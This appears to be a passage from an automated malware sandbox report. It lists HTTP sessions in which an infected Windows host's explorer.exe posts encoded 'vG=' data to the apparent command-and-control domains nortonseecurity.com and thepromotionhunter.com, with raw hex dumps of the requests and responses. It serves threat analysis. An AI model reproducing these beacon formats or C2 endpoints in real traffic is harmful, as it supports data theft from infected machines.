62 6a 74 61 61 41 69 33 28 67 4f 52 74 6f 6f 31 35 4f 6d 32 72 70 49 45 43 70 78 74 56 53 57 50 70 34 56 41 46 77 79 72 47 35 52 5f 47 75 57 52 54 63 54 76 52 33 6c 46 7a 51 34 65 7a 4c 55 63 5a 6c 31 39 70 59 68 30 48 65 65 42 4e 51 47 31 7a 39 78 6f 68 73 44 7a 6c 4f 64 4c 6c 31 45 37 6d 70 4c 72 4f 57 69 43 55 34 65 38 77 6e 28 70 72 6e 38 68 33 62 43 72 45 61 71 5a 53 6f 39 7a 69 58 55 4e 65 67 46 58 55 39 6f 44 30 69 71 54 32 6f 48 37 4d 5a 63 30 35 4c 54 36 67 34 30 4f 74 74 32 52 41 6c 4e 2d 67 44 28 6d 76 76 59 4b 55 68 48 65 46 6e 28 75 4c 4e 41 55 58 4a 77 4f 52 75 58 6a 41 72 31 6f 64 4b 69 4b 35 70 62 49 73 5a 38 47 69 46 77 52 74 4e 34 4b 6c 68 55 66 62 35 4c 43 45 4a 61 49 31 39 66 75 71 34 38 4c 63 68 36 6e 63 58 51 5f 4f 63 64 69 69 44 47 4d 7a 42 74 4c 39 6e 56 72 79 6f 62 32 41 6a 55 55 71 4b 4d 66 45 44 76 6a 33 31 70 63 68 5f 67 6b 52 4d 65 67 4e 75 4c 57 50 77 4d 4c 6c 44 47 44 68 63 64 67 61 53 46 6e 6e 37 4e 66 32 57 79 57 52 4c 71 6c 57 75 72 79 31 47 73 6f 78 79 35 62 4f 30 4a 75 65 58 5a 66 50 50 39 39 4f 59 58 61 7e 4f 70 53 54 5f 41 53 30 76 56 44 6c 6a 74 65 4d 45 76 37 4b 55 33 35 6d 76 57 61 73 59 48 45 30 74 4d 68 35 70 52 45 62 68 39 33 76 49 30 61 45 4f 39 39 6a 48 67 5a 38 71 61 39 45 50 61 31 55 7a 62 72 28 57 73 4b 65 46 63 73 61 63 68 54 32 64 48 57 6a 41 56 71 43 76 61 31 43 6f 72 56 6b 37 6c 75 48 5a 48 44 44 7a 77 55 7a 76 41 4a 37 69 62 36 71 4f 4d 69 75 43 37 6f 36 4e 70 4c 51 58 50 2d 6f 75 74 77 46 78 6c 6f 4e 32 6f 67 33 37 36 6b 63 2d 7e 39 49 44 71 67 46 46 62 4d 38 46 63 65 54 69 43 33 37 4f 48 66 7e 33 32 39 37 38 76 41 28 6a 52 58 78 44 50 35 55 6b 45 54 6c 51 39 77 6c 63 32 42 31 56 78 7a 61 2d 62 55 57 30 33 32 41 70 36 50 50 46 46 43 44 2d 35 79 4b 2d 59 68 50 46 72 45 7a 44 64 42 49 57 71 73 74 79 7a 66 34 6d 4d 61 78 71 5a 30 7a 75 45 64 32 76 58 6d 66 4f 55 74 51 47 68 31 6a 44 5a 33 77 38 4e 30 47 58 70 49 38 69 4e 57 71 72 6b 76 4c 6e 37 38 50 33 76 41 59 37 54 70 50 72 78 45 63 68 33 71 58 43 42 43 55 46 48 6a 38 48 6d 74 70 41 65 63 44 62 7e 50 6b 77 74 35 6e 4c 4d 6c 32 39 59 78 41 5a 75 72 33 48 58 31 30 54 66 4d 44 77 51 30 71 46 4b 50 68 74 39 31 6f 66 52 46 64 6e 55 61 77 45 47 65 4b 75 32 45 65 5f 44 79 74 48 4b 73 59 64 54 61 4b 79 43 57 57 51 4f 6f 50 78 79 51 6c 4d 7e 35 51 41 4e 6e 67 32 6f 4c 73 42 69 76 76 51 48 53 4d 56 79 4d 6c 62 74 71 5a 38 65 4a 32 4d 36 5f 39 78 7a 5a 77 6c 66 4b 7e 53 6b 4c 70 47 69 7a 71 6f 50 71 79 30 79 5a 42 42 61 54 4c 65 6a 33 79 6c 4b 54 6b 5a 78 2d 6f 76 44 4b 32 6a 43 56 74 33 42 59 50 64 50 5a 74 48 4a 6b 61 46 51 42 45 34 63 52 49 42 49 54 47 4c 61 41 74 62 63 47 74 36 43 6c 65 57 55 5f 67 71 41 70 39 70 32 67 6b 4c 59 50 78 75 42 61 57 35 4e 6c 49 65 28 43 66 57 4a 47 76 42 71 71 4f 67 32 38 36 4f 44 4e 54 70 6a 61 57 4c 66 41 4a 33 43 31 6b 43 75 38 67 52 6d 68 32 38 43 54 44 55 33 71 30 79 75 61 70 4c 62 6c 6a 59 7e 63 62 6f 52 4a 65 4e 33 77 56 36 53 45 59 46 37 4d 74 6b 6c 56 30 65 34 53 37 4b 35 67 61 74 44 75 30 4f 64 5a 36 4d 4d 74 45 4e 36 54 4c 43 6b 64 42 66 52 72 5a 4f 6c 38 57 6a
                                                    Data Ascii: vG=2NpyRtOvnDjJbtMlWJNarGjL1YvnM8odQTDMfU5wTCJ0ml9M(lP45gvIb9hRcfGo4Dvaycmpw9jYZq517_t5LpIeSWWJsDU5sVKWrphZFHoJAazm4EnmPZEbiwCS0VYqVSKMT1~HkoWV1NwTqEqR5F2gRGAPiyUH3Eow0zSxZkgGzP2ahaDMBkHBbx5dF4s2PejBR556qhhB2uBPG5sFI979xgSwv3(A7Jrl4XN_mqTR2nUvShF9GvF9ASZMtuqzDdKoLvPZcvVlmvij1xpXaMLnnl4yuBo_ZlAVrKCtoAmGbKVhk4EYGaAMDu46y1~1w3PQhaRiH3jR~RuNXbwQBdbjtaaAi3(gORtoo15Om2rpIECpxtVSWPp4VAFwyrG5R_GuWRTcTvR3lFzQ4ezLUcZl19pYh0HeeBNQG1z9xohsDzlOdLl1E7mpLrOWiCU4e8wn(prn8h3bCrEaqZSo9ziXUNegFXU9oD0iqT2oH7MZc05LT6g40Ott2RAlN-gD(mvvYKUhHeFn(uLNAUXJwORuXjAr1odKiK5pbIsZ8GiFwRtN4KlhUfb5LCEJaI19fuq48Lch6ncXQ_OcdiiDGMzBtL9nVryob2AjUUqKMfEDvj31pch_gkRMegNuLWPwMLlDGDhcdgaSFnn7Nf2WyWRLqlWury1Gsoxy5bO0JueXZfPP99OYXa~OpST_AS0vVDljteMEv7KU35mvWasYHE0tMh5pREbh93vI0aEO99jHgZ8qa9EPa1Uzbr(WsKeFcsachT2dHWjAVqCva1CorVk7luHZHDDzwUzvAJ7ib6qOMiuC7o6NpLQXP-outwFxloN2og376kc-~9IDqgFFbM8FceTiC37OHf~32978vA(jRXxDP5UkETlQ9wlc2B1Vxza-bUW032Ap6PPFFCD-5yK-YhPFrEzDdBIWqstyzf4mMaxqZ0zuEd2vXmfOUtQGh1jDZ3w8N0GXpI8iNWqrkvLn78P3vAY7TpPrxEch3qXCBCUFHj8HmtpAecDb~Pkwt5nLMl29YxAZur3HX10TfMDwQ0qFKPht91ofRFdnUawEGeKu2Ee_DytHKsYdTaKyCWWQOoPxyQlM~5QANng2oLsBivvQHSMVyMlbtqZ8eJ2M6_9xzZwlfK~SkLpGizqoPqy0yZBBaTLej3ylKTkZx-ovDK2jCVt3BYPdPZtHJkaFQBE4cRIBITGLaAtbcGt6CleWU_gqAp9p2gkLYPxuBaW5NlIe(CfWJGvBqqOg286ODNTpjaWLfAJ3C1kCu8gRmh28CTDU3q0yuapLbljY~cboRJeN3wV6SEYF7MtklV0e4S7K5gatDu0OdZ6MMtEN6TLCkdBfRrZOl8WjJwKGGbyfQW17Xh7JgxzcLmlkd-9pbTuEk5C8eypdvsVoaE29ZcSL2ci3jClgoGdtv1OI(G8V(QwDwd~J88SiJUY.
                                                    Jan 30, 2023 13:42:14.759850025 CET910INHTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:42:14 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://thepromotionhunter.com/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Content-Length: 10932
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 ed 72 e3 46 96 e5 6f eb 29 b2 e8 b0 45 da 4c 10 e0 b7 40 51 9e 2e 7f 8d 23 ba ba 1d 2e f7 4c 6c d8 8e 8a 24 70 09 a4 95 c8 c4 64 26 f8 51 6a 45 ec ab 4c 4c c4 fe db 17 d8 bf 7e 93 7d 92 bd 09 90 14 45 81 a2 4a 55 fd b1 d3 ad 2a 92 40 e6 bd e7 9c 7b ee b9 7c f1 d5 1f bf fc f1 7f 7c ff 35 49 6d 26 ae ce 2e dd 0f 11 4c 26 d3 46 6e e9 cb 1f 1a ee 0c 58 7c 75 f6 d1 65 06 96 91 28 65 da 80 9d 36 fe f4 e3 37 74 dc 20 9d dd 8d 64 19 4c 1b 0b 0e cb 5c 69 db 20 91 92 16 24 56 2e 79 6c d3 69 0c 0b 1e 01 2d 5f da 84 4b 6e 39 13 d4 44 4c c0 34 28 71 f6 60 ce b5 9a 29 6b ce 77 20 e7 19 5b 51 9e b1 04 68 ae c1 91 84 82 e9 04 ce cb 46 cb ad 80 ab ef 7f fb cf 84 4b 44 f8 ed bf 14 01 e9 5a 35 8b 19 f9 f4 e3 71 37 08 26 e4 c7 14 48 ae 55 a6 2c 57 92 a4 05 22 eb cb 4e d5 7b 76 29 b8 bc 26 1a c4 f4 3c 96 c6 91 cc c1 46 e9 39 49 f1 69 7a de e9 d8 14 76 cd 55 af 17 a9 ac e2 df f5 36 98 c0 0b c9 2c 34 88 5d e7 e8 07 cb 73 c1 23 e6 ba 3a da 98 cf 57 99 c0 2b c7 39 6d 7c 03 10 93 9c 69 56 2b 8d 7c aa d9 7f 14 6a d2 a8 24 34 52 6b 73 13 1e 13 d2 99 23 58 a7 f1 de 72 62 40 cf 33 b4 fc b7 ff d4 5c 99 0f 26 0f 3f 0e d5 ec eb 34 91 e6 b9 bd 3a 5b 72 19 ab a5 f7 66 99 43 a6 7e e5 af c1 5a 2e 13 43 a6 e4 a6 31 63 06 fe a4 45 23 dc 10 fc dc f9 b9 63 bc a5 a7 74 f2 73 a7 0c 84 f9 19 c1 35 fc dc 29 9b 7f ee 04 7d cf f7 fc 9f 3b a3 ee 6a d4 fd b9 d3 68 37 60 65 b1 df cb 65 82 2f 66 91 3c 0f 0f 1b 4b 34 fc fd ba 02 c4 27 f7 ae 0a 1d 41 23 bc 69 60 e2 d0 da b2 6d 83 5f c2 d7 3b f2 73 67 99 53 2e 23 51 c4 8e f2 57 53 1e 94 cd 14 77 07 38 b7 97 71 e9 fd 6a be 58 80 9e 0e bd c0 0b 1a b7 b7 93 b3 ce 67 2f 70 21 dc 90 39 17 40 f0 97 15 56 d1 04 24 68 24 8f c9 67 9d b3 17 f3 42 46 8e ae 09 6d d6 b6 ad 9b 05 d3 44 b6 75 5b b5 f9 94 79 91 06 ac fc 5a 80 db 48 b3 11 31 b9 60 a6 d1 6a e7 53 ee 25 60 bf 54 a8 71 65 3f fd 74 ff ad d9 e8 c6 8d d6 64 0b 4c 0c 42 6f 80 d9 f4 b5 d5 b8 30 6f 8e 53 7e 99 32 fd a5 8a a1 0d d3 66 ee 45 38 87 fe 01 22 db f4 db 7e 9b 7b 4b 1e db 14 7f 53 e0 49 6a 91 d1 c3 21 c4 8f 0e 9f 79 2e 9b eb a6 c5 d1 da d0 c2 72 bf 85 95 56 7d c5 2c fb d3 0f bf 6f b6 5a 13 0d b6 d0 92 3c 1f d7 6e 70 61 3a 9d de c3 be dd 0d 16 35 a1 1a cb 3e 74 aa 0a 2c da 60 3d a3 a3 29 3a e0 c5 30 c7 ed 58 cf ae 73 98 36 9c 53 9d 5f 19 da 59 55 b6 99 b3 70 d3 6f 5e ae 7f 64 c9 1f 58 06 cd 46 0a 0c ed fc c9 ff c5 a9 03 19 7f 99 72 11 37 2d ea 50 ba a9 a6 bf d3 9a ad 9b 8d b9 60 2e 61 55 a2 5a c8 66 8a 3c 57 da 9a e9 0d 60 28 d6 38 93 4c c2 17 7e fb ee ed eb 55 04 b9 fd 06 1b f1 fc b6 ad a7 fe 44 5f 2a 4f 80 4c 6c 3a d1 9f 7f de ba 43 f9 49 fd a4 7f f9 65 7a 17 96 d6 0d 9f 37 f3 4f 3f bd b3 af 65 96 dc 46 29 ae d2 8d f6 12
                                                    Data Ascii: rrFo)EL@Q.#.Ll$pd&QjELL~}EJU*@{||5Im&.L&FnX|ue(e67t dL\i $V.yli-_Kn9DL4(q`)kw [QhFKDZ5q7&HU,W"N{v)&<F9IizvU6,4]s#:W+9m|iV+|j$4Rks#Xrb@3\&?4:[rfC~Z.C1cE#cts5)};jh7`ee/f<K4'A#i`m_;sgS.#QWSw8qjXg/p!9@V$h$gBFmDu[yZH1`jS%`Tqe?tdLBo0oS~2fE8"~{KSIj!y.rV},oZ<npa:5>t,`=):0Xs6S_YUpo^dXFr7-P`.aUZf<W`(8L~UD_*OLl:CIez7O?eF)
                                                    Jan 30, 2023 13:42:14.759905100 CET911INData Raw: 43 29 b8 74 83 aa bc e1 5c c6 70 4c 1b 43 df 27 bd 6e be 22 bf d3 9c 89 06 6e ef 26 c2 ca 4a 7e b8 59 9a 69 fe 14 74 47 17 e3 51 7b 38 f0 7b 17 ed 71 d7 1f b4 2f c6 17 83 ea fd 97 f6 83 eb de fe 75 eb 8b 17 41 f8 02 41 06 83 de 60 d8 1e 0c c7 5d
                                                    Data Ascii: C)t\pLC'n"n&J~YitGQ{8{q/uAA`]>ln}^Ew{{sKyTt9[*__F+=.QeAIun.!6=|N6kr[{w5yo{N._,^O_
                                                    Jan 30, 2023 13:42:14.759943008 CET912INData Raw: 03 ef cc 43 35 1a 6d b9 cd ef 69 3c dc 84 5a 80 46 75 cb 30 e5 71 0c f2 f6 41 c1 91 55 85 cb 14 34 34 ab f2 52 4d a4 84 d2 a5 05 e5 19 ce 75 5d 9d b5 5a 84 dd 54 b7 5c 62 17 b7 a7 c2 8e 31 8e 0e b7 7c 70 fb e6 cd ac b0 56 c9 9b ca 1f ea bc 45 ff
                                                    Data Ascii: C5mi<ZFu0qAU44RMu]ZT\b1|pVER4K<B5GY$7-ylSMgu0BQ5H{&[1AKfwFclpaQ(&T 54<E&&l&+dUSYLj;R+%\gWs
                                                    Jan 30, 2023 13:42:14.759979010 CET914INData Raw: be 30 6c 6b 01 21 fa c8 e3 7b 1d 3f 95 17 9f 4d 37 65 48 57 35 fe b2 eb 74 47 4f ec 2e b3 78 d8 5f 1d 3e 11 61 a6 ac 55 d9 21 c4 e6 f4 89 18 ce fa 43 84 f2 ec 89 fd a5 d5 bf 3c c7 b9 83 ce 77 76 ee a0 ff 39 ce 1d 40 3c c3 b9 03 84 47 9d e3 59 f2
                                                    Data Ascii: 0lk!{?M7eHW5tGO.x_>aU!C<wv9@<GYS$1M9Kb&eZ3 ]^?p1p'dg%<'Bf^p42lIs,NL:$&Z37)M4[c9Q|rX3/kr&\:hQ}/xL5X:Qd\l
                                                    Jan 30, 2023 13:42:14.760015011 CET915INData Raw: bf 85 90 0c 07 7e be aa 2f 5c f2 18 36 55 41 d7 77 65 e4 d6 c3 3a c3 2d d0 99 50 d1 b5 41 b6 9c c5 b1 d3 66 55 1e 92 05 d3 cd 7b 58 5a 29 d4 bf 57 d3 9a ec 3a 30 ad 56 65 27 9b aa b2 96 23 4f 99 d9 aa db dc ee 09 d0 3c 49 ed 49 b4 b2 6a 4f 84 80
                                                    Data Ascii: ~/\6UAwe:-PAfU{XZ)W:0Ve'#O<IIjO&WtL@LACPHA"<BJ(QIsbh7S<9O`CJekH0c>6p2KCk7oy;ii]5k{MiGB-TfU \(mr.d
                                                    Jan 30, 2023 13:42:14.760051966 CET916INData Raw: d0 96 3f 1d 6a 5b 5e e7 b4 60 d1 35 9a 18 5d 27 5a 15 32 de 20 1e 1e 3c b6 00 87 50 b7 81 4d 62 b8 49 31 ec 6c fd 5e 24 87 60 35 7c cb 94 5b 78 2f 92 12 a1 2e 01 0c 73 9d 73 f9 7e 3e ed 50 6a 18 16 7c c1 63 aa 21 7e 2f 86 1d 4a 0d 83 28 32 2e 55
                                                    Data Ascii: ?j[^`5]'Z2 <PMbI1l^$`5|[x/.ss~>Pj|c!~/J(2.URE<I\$p;;HPGg0dXGBCPU@5<3fFJZ}/-H5^+tH/} u{CgJ{/-umtVnRh~!H2^v
                                                    Jan 30, 2023 13:42:14.760087967 CET918INData Raw: 07 56 46 33 15 33 b1 af af 3f 98 fb 83 a0 37 e8 8e 46 6c 36 f7 67 7e df 1f 9f d0 d7 3d 54 28 b8 bc 26 1a c4 b4 e1 f4 19 14 c8 72 ee 2d 3d a5 93 4e 83 e0 52 e7 77 37 c7 a5 ff 6a 50 64 83 74 ae f6 f0 be 8e b9 fd d3 0f df 35 88 5d e7 30 6d b0 3c c7
                                                    Data Ascii: VF33?7Fl6g~=T(&r-=NRw7jPdt5]0m<=Wh^q+_=tyy qXfL9[Gw]Q>m1{^3H!Y4J7HiW:^1d^PtR`LkfZ+)!AL-W!49+;.n.ivC-Ko+}
                                                    Jan 30, 2023 13:42:14.760123014 CET919INData Raw: f8 50 25 c6 a5 fa ea ec 32 e6 0b 12 09 66 4c 19 1c 07 87 a9 51 d1 b5 c1 c0 a4 c0 62 b7 8a dd 75 79 43 2d 64 39 6e 04 68 ce b4 6d dc c7 48 99 a1 89 50 33 26 f0 36 8e b9 4c 08 37 54 b0 b5 2a 2c 8d 94 34 56 33 2e 21 26 3b b4 44 ab 22 47 94 8f ce 3e
                                                    Data Ascii: P%2fLQbuyC-d9nhmHP3&6L7T*,4V3.!&;D"G>.,830yT,B`r|.`P]w@B\6v-F:S,\0h%+}D~t?4rd$0G#Mr2Z'`7A4QBpcy)@&iQs
                                                    Jan 30, 2023 13:42:14.760159969 CET920INData Raw: cb 5f 77 f2 16 9d e8 b8 01 aa 61 2e 3b 68 0b 9e 54 ee e1 03 66 0e bf 31 dc d9 d5 59 f5 76 86 7f 65 14 37 01 ab 0c 09 17 4c 37 29 c5 05 d0 5c 83 01 4b a9 c9 59 c4 65 42 e9 c8 6f 35 aa 35 a4 3c 8e 41 4e 1b 56 17 50 b3 55 6c 00 b7 9a 2d cf 65 27 63
                                                    Data Ascii: _wa.;hTf1Yve7L7)\KYeBo55<ANVPUl-e'c\Os,B@s-.)rH1qR7d%Z[G@X>\J0]=Cu]Ba'c6l|hVG3.q4r+=d$0GMr2NHebN


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    34192.168.2.649756162.241.2.6680C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:42:17.102797985 CET921OUTGET /crhz/?vG=7PBSSZr71x6DL80+Go9LpHzLxq3YNNMMRlSEKhN5FSdA0XFSySCq1gq9Qp9tYYXK4CHyqoic/rLoBaFB2vw5CqcWWhDf4yMIsnGwhNAmLwJ5&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.thepromotionhunter.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:42:17.330441952 CET921INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 30 Jan 2023 12:42:17 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Location: http://thepromotionhunter.com/crhz/?vG=7PBSSZr71x6DL80+Go9LpHzLxq3YNNMMRlSEKhN5FSdA0XFSySCq1gq9Qp9tYYXK4CHyqoic/rLoBaFB2vw5CqcWWhDf4yMIsnGwhNAmLwJ5&s91Fd8=b8xjX_
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    35192.168.2.64975781.17.29.14880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:42:25.420042992 CET930OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.nortonseecurity.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.nortonseecurity.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.nortonseecurity.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 6a 30 5a 61 46 43 49 59 7e 62 73 6d 38 2d 54 67 34 41 64 7a 68 57 4a 77 37 47 37 66 68 63 53 72 44 32 35 39 4d 51 41 39 62 68 68 6b 48 5f 51 4d 78 45 39 66 45 52 71 64 6f 35 36 53 4b 35 67 39 4a 73 5a 51 33 66 58 62 73 75 4d 31 69 76 79 34 45 59 45 53 28 65 6b 56 43 52 76 53 74 34 75 38 73 75 34 68 51 51 76 32 31 64 6b 37 6c 30 45 59 72 46 55 51 73 69 7a 62 7e 65 52 4b 52 42 45 6a 43 57 33 56 33 77 31 37 42 70 50 6e 76 52 32 70 65 47 36 6f 30 46 37 36 4a 50 6f 62 74 76 7e 4f 42 63 70 53 6d 6d 48 49 69 42 48 64 48 33 32 6b 57 56 67 32 7a 6c 73 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: vG=j0ZaFCIY~bsm8-Tg4AdzhWJw7G7fhcSrD259MQA9bhhkH_QMxE9fERqdo56SK5g9JsZQ3fXbsuM1ivy4EYES(ekVCRvSt4u8su4hQQv21dk7l0EYrFUQsizb~eRKRBEjCW3V3w17BpPnvR2peG6o0F76JPobtv~OBcpSmmHIiBHdH32kWVg2zls.
                                                    Jan 30, 2023 13:42:25.441071033 CET930INHTTP/1.1 302 Found
                                                    cache-control: max-age=0, private, must-revalidate
                                                    connection: close
                                                    content-length: 11
                                                    date: Mon, 30 Jan 2023 12:42:25 GMT
                                                    location: http://survey-smiles.com
                                                    server: nginx
                                                    set-cookie: sid=8c6659f6-a09b-11ed-a639-bfa5bb5044b3; path=/; domain=.nortonseecurity.com; expires=Sat, 17 Feb 2091 15:56:32 GMT; max-age=2147483647; HttpOnly
                                                    Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                    Data Ascii: Redirecting


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    36192.168.2.64975981.17.29.14880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:42:27.962644100 CET932OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.nortonseecurity.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.nortonseecurity.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.nortonseecurity.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 6a 30 5a 61 46 43 49 59 7e 62 73 6d 38 64 4c 67 36 68 64 7a 70 57 4a 33 30 6d 37 66 37 73 53 76 44 32 39 39 4d 56 67 74 62 54 74 6b 48 73 59 4d 79 6d 56 66 47 52 71 64 28 70 36 57 45 5a 67 76 4a 74 35 6d 33 61 7a 68 73 74 67 31 6a 4f 69 34 47 62 73 52 73 75 6b 74 54 42 76 56 74 34 75 54 73 75 70 70 51 51 37 4d 31 64 4d 37 35 57 63 59 74 31 55 54 67 43 7a 62 7e 65 52 4f 52 42 46 32 43 57 76 7a 33 30 52 72 42 5f 4c 6e 75 77 57 70 4e 31 69 72 79 46 37 32 58 5f 6f 49 74 4d 66 5a 5a 75 51 5a 6f 6e 36 70 31 67 58 47 4c 77 7a 50 4b 6b 4a 32 6d 52 63 71 52 36 69 66 33 78 34 6b 59 64 32 4e 6d 48 67 51 6a 74 78 4f 4b 31 37 70 64 4a 48 4b 4f 43 69 75 35 37 37 59 30 52 64 67 36 78 68 5f 7e 64 4d 4b 44 6e 6b 61 6e 42 51 6c 56 30 38 61 4c 63 58 5a 4f 58 68 41 57 6d 4e 36 44 30 65 5f 6a 72 35 6c 6f 33 30 57 53 35 54 2d 64 6c 5a 52 4e 38 4b 30 51 51 68 42 4f 38 68 46 36 46 46 68 63 4e 6b 36 6a 79 54 48 67 6b 6b 71 37 4f 7e 62 35 64 75 48 67 45 76 47 55 66 76 79 64 6c 33 7a 79 72 41 79 4a 6d 33 35 61 53 37 77 30 6f 45 34 37 74 4b 52 37 72 75 74 70 73 28 6e 61 39 49 75 30 65 45 48 34 78 37 42 43 31 34 6e 6b 49 56 62 37 54 75 75 78 49 30 72 4c 6c 48 79 58 6e 34 4e 51 33 33 54 50 57 71 4f 6f 63 38 63 34 35 59 30 55 48 55 56 58 77 59 4c 55 78 37 4f 77 32 76 35 68 36 6f 52 68 67 54 36 66 51 76 36 30 59 46 42 53 63 6d 76 4b 39 4a 65 49 51 77 61 6d 75 4b 70 48 74 4f 31 36 58 72 75 55 4d 52 4a 78 66 75 57 37 4c 6a 37 43 58 31 78 35 36 61 7a 69 65 76 43 72 65 4b 6a 73 67 50 75 55 67 50 4c 28 35 53 68 68 39 62 54 6e 50 36 74 6c 64 28 36 65 70 66 62 35 67 46 75 57 6a 7a 33 6a 6c 6f 73 79 53 4f 63 4d 71 68 5f 30 6d 34 76 69 50 71 6b 7a 58 5a 7a 68 41 64 64 6c 42 77 48 6c 69 61 48 51 45 55 79 35 38 78 69 79 58 66 5f 6c 79 68 66 36 78 4c 30 75 47 67 34 55 78 76 43 67 5f 6e 36 59 36 41 77 69 4b 32 4d 52 36 6a 42 4f 30 54 6f 75 49 6d 5f 37 71 79 76 44 6a 44 38 41 65 65 55 51 46 59 74 4f 51 4b 5a 4b 48 68 63 47 49 56 5a 54 78 33 35 31 33 31 6e 34 59 76 59 28 4b 4b 67 41 74 73 34 33 70 78 2d 39 73 65 6f 4f 30 67 37 4c 32 33 2d 45 56 51 63 6b 6c 59 30 57 47 7e 67 76 31 53 53 6a 58 33 58 63 35 68 48 53 7a 6b 5a 71 51 46 59 6d 77 39 45 70 72 54 30 6f 56 58 36 39 48 7e 53 30 65 42 6d 43 65 39 63 67 51 45 77 42 44 66 6c 32 58 4a 72 43 66 69 49 68 73 54 4e 43 4d 4f 52 71 72 72 53 73 68 68 71 36 4d 46 46 6f 64 59 71 4e 46 6b 5a 52 56 73 78 65 4b 6b 72 37 42 46 52 72 58 7a 57 4a 49 6f 57 4f 38 64 6e 56 38 35 53 57 4e 6f 43 28 4f 65 5a 67 67 68 6a 55 78 35 6f 49 61 65 78 67 56 68 7a 62 4a 50 6b 78 72 54 75 32 4a 55 4b 53 43 6b 5a 77 72 74 59 56 61 57 58 59 34 4e 76 4c 64 31 64 63 36 78 71 6d 4e 35 74 49 33 49 48 6e 6b 4e 67 63 71 4e 5f 30 4d 76 74 69 79 66 35 78 61 6b 35 4c 5f 38 5a 77 51 71 79 4a 61 56 68 63 2d 42 58 61 46 37 62 37 4e 6f 42 6d 38 73 5f 67 37 4a 54 28 62 54 59 51 48 68 31 4a 6b 35 42 76 43 68 70 6f 75 33 69 72 38 64 76 6e 7a 47 63 28 48 68 71 6e 56 43 47 47 64 76 5a 28 47 6f 39 6b 38 70 7a 54 48 52 31 4a 41 70 61 72 33 36 50 49 43 45 57 45 57 4e 6a 4d 50 49 68 58 41 42 2d 35 47 62 52 64 62 4e 64 31 53 79 51 28 74 57 64 5a 41 79 79 7e 46 37 5f 6c 39 5a 64 52 52 47 31 36 6b 6d 56 31 63 36 6f 76 68 55 67 69 61 54 49 63 5a 79 38 36 43 4b 34 71 6d 41 6f 46 4d 7a 35 75 76 57 75 72 42 50 51 37 66 6c 4b 58 66 51 2d 67 6e 28 5f 5a 47 58 6e 58 4c 39 71 67 33 31 59 59 71 61 73 33 67 6f 53 41 78 66 54 57 53 55 4a 78 37 78 6b 52 6b 6a 75 55 75 75 6d 6e 50 59 36 7e 4d 33 78 41 51 68 75 61 4e 66 65 61 39 57 66 42 67 4d 71 41 74 4b 77 37 4d 56 54 63 41 49 4e 35 42 56 72 70 31 4e 35 61 35 33 79 51 56 64 54 45 35 33 56 71 48 78 49 68 34 34 39 31 43 38 5a 56 62 6e 72 76 47 43 4b 33 67 49 75 72 51 47 63 49 79 39 5f 6b 6c 47 47 55 70 7a 72 6d 64 41 46 4a 5a 48 49 50 4a 6b 57 30 66 7e 46 61 6a 6a 48 49 32 62 67 59 31 77 59 6c 79 6b 72 45 61 6b 64 51 4e 32 69 47 79 4e 37 74 62 4f 6e 4c 6c 79 35 36 38 54 6a 56 6d 41 73 5a 58 6b 75 41 56 73 46 6f 6c 4a 74 72 49 69 61 44 5a 51 52 31 34 75 47 41 43 77 61 63 65 58 5a 74 4f 30 61 65 41 47 62 31 73 6d 65 37 62 6a 6e 62 75 4a 4c 53 49 50 42 62 47 51 51 54 46 72 50 4b 6f 75 70 55 67 6c 5f 6e 36 52 36 79 67 66 45
